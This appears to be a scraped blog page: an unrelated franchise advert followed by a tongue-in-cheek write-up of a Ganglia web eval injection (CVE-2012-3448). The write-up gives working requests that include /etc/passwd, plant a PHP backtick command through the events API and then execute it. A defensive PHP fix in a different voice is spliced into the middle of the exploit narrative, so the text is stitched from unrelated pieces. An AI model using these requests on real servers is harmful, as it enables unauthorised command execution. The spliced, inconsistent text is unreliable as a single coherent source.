Aquí Hay Trabajo

A company with experience in personal assistance services is looking for national franchisees (international ones in the near future) to offer its services to families, the elderly and children, resolving any unforeseen event in our daily routine: health, school, travel, home, etc.

Saturday, 29 August 2020

Extending Your Ganglia Install With The Remote Code Execution API

Previously I had gone over a somewhat limited local file include in the Ganglia monitoring application (http://ganglia.info). The previous article can be found here -
http://console-cowboys.blogspot.com/2012/01/ganglia-monitoring-system-lfi.html

I recently grabbed the latest version of the Ganglia web application to see whether this issue had been fixed, and I was pleasantly surprised... the GitHub repository is over here -
https://github.com/ganglia/ganglia-web
Looking at the code, the following (abbreviated) sequence can be found in "graph.php" -

$graph = isset($_GET["g"])  ?  sanitize ( $_GET["g"] )   : "metric";
....
$graph_arguments = NULL;
$pos = strpos($graph, ",");
$graph_arguments = substr($graph, $pos + 1);
....
eval('$graph_function($rrdtool_graph,' . $graph_arguments . ');');


I can only guess that this snippet of code was meant to be used as some sort of API put in place for remote developers; unfortunately, it is slightly broken. For some reason, when this API was being developed, part of its interface was wrapped in the following function -

function sanitize ( $string ) {
  return  escapeshellcmd( clean_string( rawurldecode( $string ) ) ) ;
}


According to the PHP documentation -
Following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. In Windows, all these characters plus % are replaced by a space instead.


This limitation of the API means we cannot simply pass in a function such as eval, exec or system, or use backticks, to create our Ganglia extension. Our only option is a PHP language construct that does not require "(" or ")"; a quick look at the available options (http://www.php.net/manual/en/reserved.keywords.php) suggests that "include" would work nicely. An example API request that would help with administrative reporting follows:
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/etc/passwd'
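The root cause in the sequence above is that escapeshellcmd() strips shell metacharacters, not PHP syntax, so the "sanitized" string still reaches eval as code and a language construct with no parentheses slips straight through. The following is an added example, not Ganglia's code, showing how the same dispatch can be written without eval: the report name is matched against an allowlist and the remaining arguments are validated as plain tokens and passed to the report function as data. The names GRAPH_FUNCTIONS, dispatch_graph(), graph_cpu_report() and graph_load_report(), and the argument pattern, are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added example (not Ganglia's code). The names below are assumptions.
// Allowlist of report functions the dispatcher may call, keyed by the value
// of the "g" parameter. Only names listed here are ever invoked.
const GRAPH_FUNCTIONS = [
    'cpu_report'  => 'graph_cpu_report',
    'load_report' => 'graph_load_report',
];

// Stand-in report functions so the example runs on its own.
function graph_cpu_report(array $rrdtool_graph, string ...$args): string
{
    return 'cpu_report(' . implode(',', $args) . ')';
}

function graph_load_report(array $rrdtool_graph, string ...$args): string
{
    return 'load_report(' . implode(',', $args) . ')';
}

// Vulnerable pattern from the post, kept only for comparison:
//   $graph_arguments = substr($graph, strpos($graph, ',') + 1);
//   eval('$graph_function($rrdtool_graph,' . $graph_arguments . ');');
// escapeshellcmd() does not touch quotes that are paired, spaces or keywords,
// so "cpu_report,include '/etc/passwd'" survives it and is evaluated as PHP.

function dispatch_graph(string $g, array $rrdtool_graph): string
{
    $parts = explode(',', $g);
    $name  = array_shift($parts);

    // 1. The report name must be an exact allowlist key: no eval and no
    //    variable function name built from request data.
    if (!array_key_exists($name, GRAPH_FUNCTIONS)) {
        throw new InvalidArgumentException('unknown graph report');
    }

    // 2. Every remaining argument must match a strict token pattern (assumed
    //    here). Quotes, spaces, keywords and paths are rejected outright
    //    rather than "escaped".
    foreach ($parts as $arg) {
        if (!preg_match('/\A[A-Za-z0-9_.-]{1,64}\z/', $arg)) {
            throw new InvalidArgumentException('invalid graph argument');
        }
    }

    // 3. Call the allowlisted function with the validated arguments as data.
    $fn = GRAPH_FUNCTIONS[$name];
    return $fn($rrdtool_graph, ...$parts);
}

// Usage: a legitimate request, then the payload shape from the post.
$rrdtool_graph = [];
echo dispatch_graph('cpu_report,1h', $rrdtool_graph), "\n";
try {
    dispatch_graph("cpu_report,include '/etc/passwd'", $rrdtool_graph);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

With the eval removed, the contents of any file the application stores (the events.json file used later in the post included) are only ever read as data, so a stored PHP tag in an event summary no longer has anything to execute it. When auditing a PHP code base for this class of bug, grep for eval, variable functions and include/require whose operands are derived from $_GET, $_POST or $_REQUEST, and treat escapeshellcmd()/escapeshellarg() as relevant only to shell commands.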

Very helpful, we can get a nice report with a list of current system users. Reporting like this is a nice feature but what we really would like to do is create a new extension that allows us to execute system commands on the Ganglia system. After a brief examination of the application it was found that we can leverage some other functionality of the application to finalize our Ganglia extension. The "events" page allows for a Ganglia user to configure events in the system, I am not exactly sure what type of events you would configure, but I hope that I am invited.
As you can see in the screenshot, I have marked the "Event Summary" with "php here". When creating our API extension event we will fill in this field with the command we wish to run; see the following example request -
http://192.168.18.157/gang/api/events.php?action=add&summary=<%3fphp+echo+`whoami`%3b+%3f>&start_time=07/01/2012%2000:00%20&end_time=07/02/2012%2000:00%20&host_regex=

This request will set up an "event" that will let everyone know who you are, which would be the friendly thing to do when attending an event. We can now go ahead and wire up our API call to attend our newly created event. Since we know that Ganglia keeps track of all planned events in the following location, "/var/lib/ganglia/conf/events.json", let's go ahead and include this file in our API call -
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/var/lib/ganglia/conf/events.json'


As you can see we have successfully made our API call and let everyone know at the "event" that our name is "www-data". From here I will leave the rest of the API development up to you. I hope this article will get you started on your Ganglia API development and you are able to implement whatever functionality your environment requires. Thanks for following along.

Update: This issue has been assigned CVE-2012-3448
